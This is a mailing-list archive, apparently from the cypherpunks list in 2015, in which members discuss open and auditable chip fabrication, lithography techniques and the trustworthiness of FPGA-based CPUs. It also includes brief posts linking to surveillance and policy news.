- -- The Doctor [412/724/301/703/415] [ZS] PGP: 0x807B17C1 / 7960 1CDC 85C9 0B63 8D9F DD89 3BD8 FF2B 807B 17C1 WWW: https://drwho.virtadpt.net/ "The world is not a match for you and me/No matter what we used to say!" --InSoc -----BEGIN PGP SIGNATURE----- -----END PGP SIGNATURE----- From wirelesswarrior at safe-mail.net Wed Jul 29 10:45:01 2015 From: wirelesswarrior at safe-mail.net (wirelesswarrior at safe-mail.net) Date: Wed, 29 Jul 2015 13:45:01 -0400 Subject: Open Fabs Message-ID: -------- Original Message -------- From: jim bell Apparently from: cypherpunks-bounces at cpunks.org To: Zenaan Harkness , "cypherpunks at cpunks.org" Subject: Re: Open Fabs Date: Wed, 29 Jul 2015 16:40:40 +0000 (UTC) ----- Original Message ----- From: Zenaan Harkness On 7/29/15, wirelesswarrior at safe-mail.net wrote: >> For CPunks what's needed is a DIY Electron Beam Litho apparatus. It's >> basically an electron microscope in reverse. For relatively simple chips it >> could be more than adequate as it possibly eliminates the need and >> complexity, chemistry, etc. for masks and can perform most all process >> functions (doping, implantation, etc.) and attain feature sizes commensurate >> with current foundry tech.
AFAIK, its possible to build from used >> e-microscopes though maintaining calibration and linarity is something best >> learned in a working environment at someone else's expense. :) One of the >> main shortcomings of EBL is its low production rate since all features must >> be developed by "writing" them, like an old stylevector display, on the >> substrate. >Whereas with "photon lithography" (terminology?) a light source covers >an area (of the mask?) which is then lens-focused down to the >appropriate scale (eg 24nm) onto the silicon and etc physical layer? >Firstly is this minimal understanding correct? That's the way things were about 25 or so years ago. Wafers with photoresist were exposed with machines using UV, which over the years used ever-decreasing wavelengths of UV, in equipment:436. 365nm, and 248nm, eventually reaching 193 nanometer UV. In the 1970's, entire wafer-masks (which covered the entire wafer) were used. This became impractical as feature-sizes were reduced. Step-and-repeat devices ("wafer-steppers) https://en.wikipedia.org/wiki/Stepper then allowed exposure of a much smaller portion of a wafer. (these eventually used mirrors, rather than lenses, because it is hard to process UV in a solid lens.) However, because the wavelength of light eventually became a large portion of the size of a chip feature (a line or a space) it was increasingly difficult to 'draw' the picture necessary to expose the resist on the wafer. Due to many ever-more-heroic technologies, it eventually became possible to use 293 nanometer wavelength to expose features far smaller than the wavelength itself, which would have been considered phenomenal in the 1970's. These days, EUV ("extreme ultraviolet") has been used for ever more small features. https://en.wikipedia.org/wiki/Extreme_ultraviolet https://en.wikipedia.org/wiki/Extreme_ultraviolet_lithography EUV is strongly absorbed by air, so such exposure is typically done in a vacuum. > > Is this using near-field optics? 
There also has been experimentation with soft x-rays using wiggler-type linear accelerators. > > The differences between photons and electrons enable e-microscopes and EBL (which also operates in the vacuum) to avoid the optical-based limitations. > >Secondly is there any potential areal electron emission device (as >opposed to point electron emission device) comparable to current litho >tech (areal photon emission)? None that I'm aware of. But EUV will take over from electron-beam: The latter is quite slow, and typically has been used mostly for making masks. From wirelesswarrior at safe-mail.net Wed Jul 29 11:06:41 2015 From: wirelesswarrior at safe-mail.net (wirelesswarrior at safe-mail.net) Date: Wed, 29 Jul 2015 14:06:41 -0400 Subject: Open Fabs Message-ID: -------- Original Message -------- From: Zenaan Harkness Apparently from: cypherpunks-bounces at cpunks.org To: cypherpunks at cpunks.org Subject: Re: Open Fabs Date: Wed, 29 Jul 2015 09:27:53 +0000 > On 7/29/15, wirelesswarrior at safe-mail.net wrote: > > For CPunks what's needed is a DIY Electron Beam Litho apparatus. It's > > basically an electron microscope in reverse. For relatively simple chips it > > could be more than adequate as it possibly eliminates the need and > > complexity, chemistry, etc. for masks and can perform most all process > > functions (doping, implantation, etc.) and attain feature sizes commensurate > > with current foundry tech. AFAIK, it's possible to build from used > > e-microscopes though maintaining calibration and linearity is something best > > learned in a working environment at someone else's expense. :) One of the > > main shortcomings of EBL is its low production rate since all features must > > be developed by "writing" them, like an old style vector display, on the > > substrate.
> > Whereas with "photon lithography" (terminology?) a light source covers > an area (of the mask?) which is then lens-focused down to the > appropriate scale (eg 24nm) onto the silicon and etc physical layer? > Firstly is this minimal understanding correct? > > Secondly is there any potential areal electron emission device (as > opposed to point electron emission device) comparable to current litho > tech (areal photon emission)? There was research and patenting in this area beginning in the 60-70s but I not seen any articles showing use. From rsw at jfet.org Wed Jul 29 11:07:14 2015 From: rsw at jfet.org (Riad S. Wahby) Date: Wed, 29 Jul 2015 14:07:14 -0400 Subject: Open Fabs In-Reply-To: <55B9064E.5010903@virtadpt.net> References: <55B9064E.5010903@virtadpt.net> Message-ID: <20150729180714.GA2509@antiproton.jfet.org> The Doctor wrote: > More likely, dump the contents of the EPROM some FPGAs read their gate > matrices out of when they power up. But that just gives away the bitstream describing the FPGA configuration (say, a trusted CPU). Is the CPU's *design* a secret? If not, I don't see why it matters that an evil cleaner might read out the FPGA's configuration. (Obviously, don't store secret keys in there!) If we really are worried about keeping the CPU's design a secret, it's possible with many FPGAs to encrypt the configuration bitstream such that the configuration is decrypted onboard the FPGA at power-on. This is intended to handle the case where I want to sell a product that uses an FPGA without revealing the contents of that FPGA's configuration to my customers or competitors. Of course, this doesn't really provide useful security guarantees against a sophisticated adversary. First, since the FPGA contains or automatically derives the secret key to decrypt this encrypted bitstream, the manufacturer of the FPGA likely also knows the key or how to derive it (as does anyone with sufficient dedication and a well-equipped lab). 
Second, we have no idea how well this system is designed or implemented, since the bitstream security system is itself a proprietary secret. And third, even if it's competently built, as I pointed out above, the threat model is "customer reads out my proprietary design," which means that, practically speaking, the technological barrier is only there to support a more comprehensive framework of legal recourse in the case that my customer or competitor tries to steal the secret sauce. Probably a reasonable evil cleaner attack against an FPGA-based "trusted" CPU is to overwrite the contents of the configuration ROM with a similar but subtly bugged design. This is more or less isomorphic to "the NSA signs bugged microcode for my Intel CPU." Cue the OTP / epoxy / physical security arms race, I guess. -=rsw From grarpamp at gmail.com Wed Jul 29 11:37:09 2015 From: grarpamp at gmail.com (grarpamp) Date: Wed, 29 Jul 2015 14:37:09 -0400 Subject: Open Fabs In-Reply-To: References: Message-ID: Pasting in more from the truecrypt thread that should have gone in here... Dnia wtorek, 28 lipca 2015 21:34:07 Steve Kinney pisze: > If a market is willing to pay enough to support and grow the > project, it can be done. Are there potential partners and large > scale consumers for "top security through total transparency" to > make an open hardware project viable today? rysiek: Yes. And there are ways to create a market like that, albeit it takes time. > I haven't looked at how the Black Phone folks are doing lately, > but that looks like the kind of product line where open hardware > might find its first viable home. rysiek: Funny you should ask: http://www.theinquirer.net/inquirer/news/2402536/us-department-of-defence-adopts-nsa-proof-blackphone-devices On 07/28/2015 03:40 PM, oshwm wrote: > So is anyone working on building an 'openfab' or is it such a big > task that everyone just backs away in horror? 
:D doctor: The closest I know to that is Jeri Ellsworth, who's at the point of fabbing her own discrete transistors in a homebrew semiconductor foundry. If she's still working on this project, she's probably a bit closer but I haven't spoken to her about it. From rsw at jfet.org Wed Jul 29 12:25:28 2015 From: rsw at jfet.org (Riad S. Wahby) Date: Wed, 29 Jul 2015 15:25:28 -0400 Subject: Open Fabs In-Reply-To: <55B91C79.8010203@virtadpt.net> References: <55B9064E.5010903@virtadpt.net> <20150729180714.GA2509@antiproton.jfet.org> <55B91C79.8010203@virtadpt.net> Message-ID: <20150729192528.GA3353@antiproton.jfet.org> The Doctor wrote: > I thought the point being made in the conversation was (and correct me > if I'm wrong) that one could dump an arbitrary FPGA's contents to do a > security audit on them. Ah, I see. I thought the focus was on cold boot or evil maid attacks against FPGA-based (thus, nominally trustworthy) CPUs, and how these attacks might compare to similar attacks against a commercial CPU. As you pointed out before, one may as well just grab the configuration out of the ROM itself, and I agree---but my point was that either way, what are we getting except some information that's not really secret? So I think we're in violent agreement, at least to the extent that we're talking about the same thing :) Also: one assumes that cold boot attacks against the contents of RAM are more useful than against the SRAMs that hold the FPGA's configuration, and in that case probably it's little different from the equivalent attack against a commercial CPU (the DRAM is more or less the same whether we're talking about the commercial or the FPGA-based CPU---you're using the same DIMMs either way). On further reflection, I suppose the contents of the block RAMs inside the FPGA (little SRAMs sprinkled through the fabric) might be a prize worth chasing, since those are presumably acting as registers and cache for our CPU. 
It *might* be possible to do so by cold booting the FPGA with a configuration that dumps the contents of the block RAMs, assuming that those contents aren't cleared by power-on reset or the configuration process itself. To your point above about auditing the configuration actually running on an FPGA: that would be very interesting to prevent against an FPGA manufacturer going the reflections-on-trusting-trust route. Here's one way an evil FPGA manufacturer might proceed: the CAD software that the manufacturer provides with the FPGA detects that you're synthesizing a CPU. Rather than emit a flawed bitstream (which might be detectable just by examining the bitstream itself), perhaps the software would hide in the bitstream some instructions that direct the FPGA's configuration state machine to introduce flaws at config time. (FPGA config bitstreams are big, complicated, and proprietary; so it's not impossible that they contain enough redundancy that one could use stego to hide such commands in the bitstream.) (This approach also helps to get around the fact that the synthesis and fitting process does a randomized search for a configuration that meets your criteria (e.g., speed, size, etc.). In other words: the best time to detect "this guy is trying to build a CPU" is when the software is reading your Verilog, not when it's loading the bitstream into an FPGA, because it's really really hard to decide "this is a CPU" just by examining the bitstream itself.) But I suppose if I were so devious as a manufacturer of FPGAs as to detect a CPU design and introduce subtle bugs as a result, I would probably also do my best to keep you from detecting it, even if you *are* able to read out the config from a running FPGA. It's quite a large haystack for hiding such a little needle... 
(And regarding cold booting to read out the config SRAMs: I worry even more here than in the case of block RAMs that these have a carefully designed power-on reset scheme in place so that the FPGA fabric comes up in a known state.) -=rsw From jdb10987 at yahoo.com Wed Jul 29 09:40:40 2015 From: jdb10987 at yahoo.com (jim bell) Date: Wed, 29 Jul 2015 16:40:40 +0000 (UTC) Subject: Open Fabs In-Reply-To: References: Message-ID: <2063575076.5180904.1438188040721.JavaMail.yahoo@mail.yahoo.com> ----- Original Message ----- From: Zenaan Harkness On 7/29/15, wirelesswarrior at safe-mail.net wrote: >> For CPunks what's needed is a DIY Electron Beam Litho apparatus. It's >> basically an electron microscope in reverse. For relatively simple chips it >> could be more than adequate as it possibly eliminates the need and >> complexity, chemistry, etc. for masks and can perform most all process >> functions (doping, implantation, etc.) and attain feature sizes commensurate >> with current foundry tech. AFAIK, it's possible to build from used >> e-microscopes though maintaining calibration and linearity is something best >> learned in a working environment at someone else's expense. :) One of the >> main shortcomings of EBL is its low production rate since all features must >> be developed by "writing" them, like an old-style vector display, on the >> substrate. >Whereas with "photon lithography" (terminology?) a light source covers >an area (of the mask?) which is then lens-focused down to the >appropriate scale (eg 24nm) onto the silicon and etc physical layer? >Firstly is this minimal understanding correct? That's the way things were about 25 or so years ago. Wafers with photoresist were exposed with machines using UV, which over the years used ever-decreasing wavelengths of UV, in equipment: 436, 365nm, and 248nm, eventually reaching 193 nanometer UV. In the 1970's, entire wafer-masks (which covered the entire wafer) were used.
This became impractical as feature-sizes were reduced. Step-and-repeat devices ("wafer-steppers") https://en.wikipedia.org/wiki/Stepper then allowed exposure of a much smaller portion of a wafer. (These eventually used mirrors, rather than lenses, because it is hard to process UV in a solid lens.) However, because the wavelength of light eventually became a large portion of the size of a chip feature (a line or a space) it was increasingly difficult to 'draw' the picture necessary to expose the resist on the wafer. Due to many ever-more-heroic technologies, it eventually became possible to use 293 nanometer wavelength to expose features far smaller than the wavelength itself, which would have been considered phenomenal in the 1970's. These days, EUV ("extreme ultraviolet") has been used for ever more small features. https://en.wikipedia.org/wiki/Extreme_ultraviolet https://en.wikipedia.org/wiki/Extreme_ultraviolet_lithography EUV is strongly absorbed by air, so such exposure is typically done in a vacuum. >Secondly is there any potential areal electron emission device (as >opposed to point electron emission device) comparable to current litho >tech (areal photon emission)? None that I'm aware of. But EUV will take over from electron-beam: The latter is quite slow, and typically has been used mostly for making masks. From admin at pilobilus.net Wed Jul 29 15:06:10 2015 From: admin at pilobilus.net (Steve Kinney) Date: Wed, 29 Jul 2015 18:06:10 -0400 Subject: Open Fabs In-Reply-To: References: Message-ID: <55B94E52.2050709@pilobilus.net> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 On 07/29/2015 02:37 PM, grarpamp wrote: > Pasting in more from the truecrypt thread that should have gone > in here...
> > > On Tuesday, 28 July 2015 21:34:07 Steve Kinney wrote: >> If a market is willing to pay enough to support and grow the >> project, it can be done. Are there potential partners and >> large scale consumers for "top security through total >> transparency" to make an open hardware project viable today? > rysiek: Yes. And there are ways to create a market like that, > albeit it takes time. >> I haven't looked at how the Black Phone folks are doing >> lately, but that looks like the kind of product line where >> open hardware might find its first viable home. > rysiek: Funny you should ask: > http://www.theinquirer.net/inquirer/news/2402536/us-department-of-defence-adopts-nsa-proof-blackphone-devices Good > catch! See also: See also: http://www.defenseone.com/technology/2015/03/pentagon-rolls-out-nsa-proof-smartphones/108892/ Must have been something in the air. Now everybody will want something similar - and some won't have the luxury of trusting the NSA, NRO, ETC the same way the DoD can. "Let's talk about the chips in your TAO/ANT Brand scrambler phones..." :o) > On 07/28/2015 03:40 PM, oshwm wrote: >> So is anyone working on building an 'openfab' or is it such a >> big task that everyone just backs away in horror? :D > doctor: The closest I know to that is Jeri Ellsworth, who's at > the point of fabbing her own discrete transistors in a homebrew > semiconductor foundry. If she's still working on this project, > she's probably a bit closer but I haven't spoken to her about > it. I do see problems with scaling DYI chip projects up to commercial production numbers, and down in scale to achieve fast, high capacity performance. That's why I am much more interested in the prospects of a manufacturing process built for radical transparency, using "commercial best practice" technology at conventional production facilities.
IMO the same kind of radical transparency should apply to all industrial processes that pose large potential hazards to public health & safety, i.e. nuclear power stations, transgenic agriculture, etc. :o) From jdb10987 at yahoo.com Wed Jul 29 12:22:04 2015 From: jdb10987 at yahoo.com (jim bell) Date: Wed, 29 Jul 2015 19:22:04 +0000 (UTC) Subject: Open Fabs In-Reply-To: References: Message-ID: <968844891.5173846.1438197724907.JavaMail.yahoo@mail.yahoo.com> From: "wirelesswarrior at Safe-mail.net" -------- Original Message -------- From: jim bell ----- Original Message ----- From: Zenaan Harkness On 7/29/15, wirelesswarrior at safe-mail.net wrote: >>That's the way things were about 25 or so years ago. Wafers with photoresist were exposed with machines using UV, which over the years used >>ever-decreasing wavelengths of UV, in equipment:436. 365nm, and 248nm, eventually reaching 193 nanometer UV. In the 1970's, entire wafer-masks (which >>covered the entire wafer) were used. This became impractical as feature-sizes were reduced.
Step-and-repeat devices ("wafer-steppers") >>https://en.wikipedia.org/wiki/Stepper then allowed exposure of a much smaller portion of a wafer. (These eventually used mirrors, rather than lenses, >>because it is hard to process UV in a solid lens.) >>However, because the wavelength of light eventually became a large portion of the size of a chip feature (a line or a space) it was increasingly difficult to >>'draw' the picture necessary to expose the resist on the wafer. Due to many ever-more-heroic technologies, it eventually became possible to use 193 >>nanometer wavelength to expose features far smaller than the wavelength itself, which would have been considered phenomenal in the 1970's. >>These days, EUV ("extreme ultraviolet") has been used for ever more small features. https://en.wikipedia.org/wiki/Extreme_ultraviolet >>https://en.wikipedia.org/wiki/Extreme_ultraviolet_lithography EUV is strongly absorbed by air, so such exposure is typically done in a vacuum. >Is this using near-field optics? There also has been experimentation with soft x-rays using wiggler-type linear accelerators. >The differences between photons and electrons enable e-microscopes and EBL (which also operates in the vacuum) to avoid the optical-based >limitations. I really don't know about modern EUV lithography. That's why I cited the Wikipedia article, above. It has a huge amount of information I haven't been keeping up on. (I've had excuses...) It is clearly extremely difficult/expensive to develop, which is in large part why they took so long to go from 193 nm to EUV's 13.5 nm. Just reading that article is painful. But they have to do it, because they want to get to feature sizes of 10nm and below. It takes about 10 'square features' to make a DRAM cell. A DRAM whose storage array is 1 cm^2 might, in principle, contain 100 billion DRAM cells. Jim Bell
From list at sysfu.com Wed Jul 29 19:48:05 2015 From: list at sysfu.com (Seth) Date: Wed, 29 Jul 2015 19:48:05 -0700 Subject: Best court document you've read in your life Message-ID: Includes interesting info about Target shopping chain pulling surveillance video to identify a Tracphone buyer, surveillance drone usage in support of car-theft ring on Mare Island in the Bay Area, threatening the local Vallejo police department, Christian repent, you name it. And of course the obligatory dipshit move or two by the defendant in the criminal complaint, such as leaving his driver's license under the seat of a stolen car. Starts getting good around page 20. Hat tips to Jacob AppleBaum and @ncweaver (twitter) https://twitter.com/ioerror/status/624249473779257344 http://www1.icsi.berkeley.edu/~nweaver/vallejo.pdf From odinn.cyberguerrilla at riseup.net Wed Jul 29 20:09:49 2015 From: odinn.cyberguerrilla at riseup.net (odinn) Date: Wed, 29 Jul 2015 20:09:49 -0700 Subject: True Crypt is Not Secure In-Reply-To: <0B5F8A86-54B3-4393-AE95-3022BFA7CC53@openmailbox.org> References: <1437752365-sup-6750@metis.syd1.tesser.org> <0B5F8A86-54B3-4393-AE95-3022BFA7CC53@openmailbox.org> Message-ID: <55B9957D.8080102@riseup.net> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 I have heard word of some 'openfab' project that someone has been working on, I will inquire and will post more details if it actually has led to something. On 07/28/2015 03:40 PM, oshwm wrote: > So is anyone working on building an 'openfab' or is it such a big > task that everyone just backs away in horror? :D > > > On 28 July 2015 22:04:38 BST, grarpamp wrote: >>> TrueCrypt has been audited[0] and come through relatively >>> unscathed; I'd trust it over a Microsoft product I'd need to >>> disassemble to examine any day.
> >> You may trust your opensource code but would still need to >> disassemble and audit any critical and closed windows libs and >> system interfaces you compile against, let alone run in / under. >> This is the trouble with closed platforms. You have some luck >> with open unix, but the luck buck currently stops at the iron >> and the hardware is getting worse. And we don't have any open >> fabs on the horizon to solve it. This is BAD. > > > - -- http://abis.io ~ "a protocol concept to enable decentralization and expansion of a giving economy, and a new social good" https://keybase.io/odinn From grarpamp at gmail.com Wed Jul 29 17:24:30 2015 From: grarpamp at gmail.com (grarpamp) Date: Wed, 29 Jul 2015 20:24:30 -0400 Subject: Obama Orders Exaflop CPUs... Spy And Police You Message-ID: http://motherboard.vice.com/read/obamas-new-executive-order-says-the-us-will-build-an-exascale-supercomputer The initiative will primarily be a partnership between the Department of Energy, Department of Defense, and National Science Foundation, which will be designing supercomputers primarily for use by NASA, *the FBI*, the National Institutes of Health, *the Department of Homeland Security*, and NOAA. Each of those agencies will be allowed to provide input during the early stages of the development of these new computers. Big data... * Relatively new stakeholders, in addition to the traditional role of killing you provided by DoD/DoE. For Science...
From grarpamp at gmail.com Wed Jul 29 17:59:13 2015 From: grarpamp at gmail.com (grarpamp) Date: Wed, 29 Jul 2015 20:59:13 -0400 Subject: Open Fabs In-Reply-To: <55B94E52.2050709@pilobilus.net> References: <55B94E52.2050709@pilobilus.net> Message-ID: On Wed, Jul 29, 2015 at 6:06 PM, Steve Kinney wrote: > I do see problems with scaling DYI chip projects up to commercial > production numbers, and down in scale to achieve fast, high > capacity performance. It's not DIY. It's many similarly thinking Y's coming together to DI. Eventually you'll reach beyond any given initial fledgling "hobby class" goalposts. Nothing unusual or unachievable there. Since it's all been done before, how long to rebuild trustable compute and manufacturing from trustable discretes like relays, punchtape, and hand tools to 100nm? 5y? 10y? > That's why I am much more interested in the > prospects of a manufacturing process built for radical > transparency, using "commercial best practice" technology All part of it. > at conventional production facilities. Except this, unless you're demonstrating a way to convince these untrustable closed entities to open up their entire process and production line for your inspection pursuant to each and every audited run you want to put through it. If you're not, then you can't be certain that what you put in is what you get out. > IMO the same kind of radical transparency should apply to all > industrial processes that pose large potential hazards to public > health & safety, i.e. nuclear power stations, transgenic > agriculture, etc. You should be able to read the as-built blueprints of all of these things online, access all areas of plants for independant inspection, raise enforceable design and safety flags, etc. From grarpamp at gmail.com Wed Jul 29 18:34:49 2015 From: grarpamp at gmail.com (grarpamp) Date: Wed, 29 Jul 2015 21:34:49 -0400 Subject: Kentucky Man Jailed For Shooting Down Drone... 
Privacy, Trespass, Creeping, Etc Message-ID: http://tech.slashdot.org/story/15/07/29/142227/kentucky-man-arrested-after-shooting-down-drone "We’re not going to let it go," he said. "Because our rights are being trampled daily," he said. "Not on a local level only - but on a state and federal level." From admin at pilobilus.net Wed Jul 29 18:47:21 2015 From: admin at pilobilus.net (Steve Kinney) Date: Wed, 29 Jul 2015 21:47:21 -0400 Subject: Open Fabs In-Reply-To: References: <55B94E52.2050709@pilobilus.net> Message-ID: <55B98229.6090109@pilobilus.net> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 On 07/29/2015 08:59 PM, grarpamp wrote: [ ... ] >> That's why I am much more interested in the prospects of a >> manufacturing process built for radical transparency, using >> "commercial best practice" technology > > All part of it. > >> at conventional production facilities. > > Except this, unless you're demonstrating a way to convince > these untrustable closed entities to open up their entire > process and production line for your inspection pursuant to > each and every audited run you want to put through it. If > you're not, then you can't be certain that what you put in is > what you get out. That's exactly what I'm talking about: Essentially taking over the production process and working alongside facility staff, with particular attention to choke points where validation is both possible and productive. ISO quality programs include provision for onsite participation by clients; it's more a question of money, and picking a facility that can readily accommodate the requirements, than of getting anyone to open up any closed process. This might deprive one of the advantages of "commercial trade secret" techniques belonging to the facility's owners, but that's kind of the whole point of the exercise. Smaller facilities with older equipment would be better prospects than the mega-shops. 
One should never be certain that one is receiving exactly what was specified, regardless of validation. Somewhere, the rising curve of security costs will cross a falling curve of security risks, and that's as good a place as any to draw a line. Mark the other side of the line "here be dragons - maybe." End users can pick up any perceived slack if and as they want to spend the money to do so. >> IMO the same kind of radical transparency should apply to >> all industrial processes that pose large potential hazards to >> public health & safety, i.e. nuclear power stations, >> transgenic agriculture, etc. > > You should be able to read the as-built blueprints of all of > these things online, access all areas of plants for independent > inspection, raise enforceable design and safety flags, etc. Damn straight. I'm especially picky about the inspection records of nuclear power facilities; IMO they should include video of the inspectors at work, especially in hazardous / PITA locations they might be inclined to skip. I recall at least one case where reactor inspection logs were casually falsified for years, very nearly causing a catastrophic core breach due to undetected containment vessel deterioration located "around a corner and out of sight" from casual view.
From softservant at gmail.com Wed Jul 29 22:25:38 2015 From: softservant at gmail.com (Softy) Date: Wed, 29 Jul 2015 22:25:38 -0700 Subject: Open Fabs Message-ID: > It's not DIY. It's many similarly thinking Y's coming together to DI. > Eventually you'll reach beyond any given initial fledgling "hobby > class" goalposts. Nothing unusual or unachievable there. > > Honestly, a good model for acquiring capital for a radical idea, one could do worse than to consult Sea Shepherd - half dozen plus fleet navy of multiple multi-million dollar ships with expensive operations costs. EarthFirst isn't as capital intense, but good at putting the limited capital into direct action. From softservant at gmail.com Wed Jul 29 22:34:25 2015 From: softservant at gmail.com (Softy) Date: Wed, 29 Jul 2015 22:34:25 -0700 Subject: Open Fabs Message-ID: > > IMO the same kind of radical transparency should apply to all > > industrial processes that pose large potential hazards to public > > health & safety, i.e.
nuclear power stations, transgenic > > agriculture, etc. > > > Are you crazy? The terrists would use the information > against the good guys. > > > It seems very quickly an OpenFab plant will need to implement the same security as a current conventional plant. This will of necessity include keeping out plebs/civilians/non-plant workers. And there you go again not knowing who's doing what within the plant. Unless you happen to be on the inside ... From grarpamp at gmail.com Wed Jul 29 19:48:56 2015 From: grarpamp at gmail.com (grarpamp) Date: Wed, 29 Jul 2015 22:48:56 -0400 Subject: Open Fabs In-Reply-To: <55B98229.6090109@pilobilus.net> References: <55B94E52.2050709@pilobilus.net> <55B98229.6090109@pilobilus.net> Message-ID: On Wed, Jul 29, 2015 at 9:47 PM, Steve Kinney wrote: > That's exactly what I'm talking about: Essentially taking over > the production process and working alongside facility staff, with > particular attention to choke points where validation is both > possible and productive. ISO quality programs include provision > for onsite participation by clients I submit the above is moot... you're taking your chip design in on your USB, happy as a clam to be the one to insert it into their computer, pull it up on their screen, and watch the whole thing play out before your eyes... on down the line till out pops a chip in your hand, yay! But you failed to realize their computer and software probably wasn't made by them, nor has any open to you audit crosscheck been wrapped around it or its operators and maintainers... on down the line. You can carve a stick with a knife but you can't really build a trusted cpu with an untrusted cpu.
If the goal is to build an open trusted fab, you must build an open trusted fab, by and with the hard and different philosophical mofos who refuse to concur unless each step of design, build and operation is plainly validated. Otherwise you're just selling tourist tickets to the theme park. This is old school TCSEC / CC applied to manufacturing. You have cost efficiency in that the knowledge of tool and chip making already exists. You use that savings to offset cost of rebuilding with TCSEC. As opposed to trying to impart trust upon existing systems which is prohibitive. > Somewhere, the rising curve > of security costs will cross a falling curve of security risks, > and that's as good a place as any to draw a line. Trust is not defined by a point on a cost curve. From admin at pilobilus.net Wed Jul 29 20:03:43 2015 From: admin at pilobilus.net (Steve Kinney) Date: Wed, 29 Jul 2015 23:03:43 -0400 Subject: Open Fabs In-Reply-To: <55b986a7.8528370a.405dd.404b@mx.google.com> References: <55B94E52.2050709@pilobilus.net> <55b986a7.8528370a.405dd.404b@mx.google.com> Message-ID: <55B9940F.2040806@pilobilus.net> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 On 07/29/2015 10:08 PM, Juan wrote: > On Wed, 29 Jul 2015 18:06:10 -0400 Steve Kinney > wrote: > >> IMO the same kind of radical transparency should apply to >> all industrial processes that pose large potential hazards to >> public health & safety, i.e. nuclear power stations, >> transgenic agriculture, etc. > > > Are you crazy? The terrists would use the information against > the good guys. Security by obscurity ain't security at all. But of course you must have been joking. 
:D From juan.g71 at gmail.com Wed Jul 29 19:08:14 2015 From: juan.g71 at gmail.com (Juan) Date: Wed, 29 Jul 2015 23:08:14 -0300 Subject: Open Fabs In-Reply-To: <55B94E52.2050709@pilobilus.net> References: <55B94E52.2050709@pilobilus.net> Message-ID: <55b986a7.8528370a.405dd.404b@mx.google.com> On Wed, 29 Jul 2015 18:06:10 -0400 Steve Kinney wrote: > IMO the same kind of radical transparency should apply to all > industrial processes that pose large potential hazards to public > health & safety, i.e. nuclear power stations, transgenic > agriculture, etc. Are you crazy? The terrists would use the information against the good guys.
> > :o) > > From grarpamp at gmail.com Wed Jul 29 20:18:45 2015 From: grarpamp at gmail.com (grarpamp) Date: Wed, 29 Jul 2015 23:18:45 -0400 Subject: US Gov Orders Internet To Rat Out Its [Innocent] Users In-Reply-To: References: Message-ID: https://firstlook.org/theintercept/2015/07/28/sen-wyden-challenges-provision-require-tech-companies-report-terrorist-activity/ https://firstlook.org/theintercept/2015/07/29/report-dhs-warns-booting-extremists-twitter-might-upset/ From admin at pilobilus.net Wed Jul 29 21:11:06 2015 From: admin at pilobilus.net (Steve Kinney) Date: Thu, 30 Jul 2015 00:11:06 -0400 Subject: Open Fabs In-Reply-To: References: <55B94E52.2050709@pilobilus.net> <55B98229.6090109@pilobilus.net> Message-ID: <55B9A3DA.3040701@pilobilus.net> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 On 07/29/2015 10:48 PM, grarpamp wrote: > On Wed, Jul 29, 2015 at 9:47 PM, Steve Kinney > wrote: >> That's exactly what I'm talking about: Essentially taking >> over the production process and working alongside facility >> staff, with particular attention to choke points where >> validation is both possible and productive. ISO quality >> programs include provision for onsite participation by >> clients > > I submit the above is moot... you're taking your chip design in > on your USB, happy as a clam to be the one to insert it into > their computer, pull it up on their screen, and watch the whole > thing play out before your eyes... on down the line till out > pops a chip in your hand, yay! That's not what I have in mind at all. Everything that touches the production process would have to be isolated and audited. In practical terms, that would mean bringing the computers in question in from offsite, with relevant software already installed and validated. In the context at hand, watching the whole thing play out would consist of directing the whole process one step at a time, per a procedure created in collaboration with the contractor's engineering and QA departments. 
Optical masks and/or equivalent data files would be handled by client personnel and retained for validation. The chips that pop out would be under very stringent property control, and quite a lot of them would be torn down and thoroughly analyzed "at home" to validate the run. > But you failed to realize their computer and software probably > wasn't made by them, nor has any open to you audit crosscheck > been wrapped around it or it's operators and maintainers... on > down the line. You can carve a stick with a knife but you can't > really build a trusted cpu with an untrusted cpu. > > If the goal is to build an open trusted fab, you must build an > open trusted fab, by and with the hard and different > philosophical mofos who refuse to concur unless each step of > design, build and operation is plainly validated. Otherwise > you're just selling tourist tickets to the theme park. Just like doing it at an existing commercial facility, with the added advantage of much better control of physical access, hardware, etc. at the dedicated facility. Whether that advantage would be worth the extra costs, vs. real security improvements, depends on how reliable the post-production tear down and analysis of end product components is considered. "A difference that makes no difference is no difference." If it really is impossible to build a trusted CPU with an untrusted CPU, then it is not possible to build a trusted CPU. Fortunately, trust is not an absolute and there are ways to build relatively trustworthy systems from relatively untrustworthy components. A quote to the effect of "I do not care who votes, I only care who counts the votes" comes to mind but I'm too lazy to look it up right now. > This is old school TCSEC / CC applied to manufacturing. > > You have cost efficiency in that the knowledge of tool and chip > making already exists. You use that savings to offset cost of > rebuilding with TCSEC. 
As opposed to trying to impart trust > upon existing systems which is prohibitive. > >> Somewhere, the rising curve of security costs will cross a >> falling curve of security risks, and that's as good a place >> as any to draw a line. > > Trust is not defined by a point on a cost curve. I think that in the engineering and business worlds, trust is always a point on a cost curve. When Trust and Security are considered as absolutes, the costs of maintaining them rise exponentially until the protected assets die of resource starvation. Civilization as we know it is presently following the path of demanding absolute security, provided by rulers vested with absolute trust, to early termination. Getting more on the practical business of making IC chips into the public domain and widely distributed, enabling faster and decentralized recovery of today's industrial capabilities, is one of the benefits of open hardware development projects. The objectives of an open IC project include providing protections against institutional sabotage, but also the creation of protocols, documents and data that can be re-used and improved over time. Policies and protocols necessary to assure adequate transparency, including repeatability, would amount to enlarging the GPL ecosystem to encompass computer hardware as well as software. If such a project can't produce products that are cost effective for end users, it will remain at most a theme park ride for misguided investors. The "high security" angle looks like a place where potential customers and nearly off-the-shelf capabilities meet. 
